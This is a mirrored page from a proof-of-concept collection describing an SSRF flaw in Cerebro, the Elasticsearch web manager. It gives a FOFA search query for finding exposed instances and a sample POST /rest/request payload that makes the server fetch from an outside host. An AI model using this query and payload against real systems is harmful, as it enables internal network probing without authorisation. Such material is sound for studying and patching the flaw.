admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Cerebro request SSRF漏洞.md

33 lines
852 B
Markdown
Raw Normal View History

更新漏洞库:Web应用漏洞/
2022-05-24 17:29:00 +08:00
# Cerebro request SSRF漏洞
## 漏洞描述
Cerebro是使用Scala、Play Framework、AngularJS和Bootstrap构建的开源的基于Elasticsearch Web可视化管理工具。您可以通过Cerebro对集群进行web可视化管理如执行rest请求、修改Elasticsearch配置、监控实时的磁盘集群负载内存使用率等。其中某功能存在SSRF漏洞攻击者通过发送特定的请求包可以探测内网信息
## 漏洞影响
```
Cerebro
```
## FOFA
```
app="Cerebro"
```
## 漏洞复现
主页面
![image-20220524143249335](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241432380.png)
发送请求包
```
POST /rest/request
{"method":"GET","data":"","path":"robots.txt","host":"https://www.baidu.com"}
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241433022.png)
Reference in New Issue Copy Permalink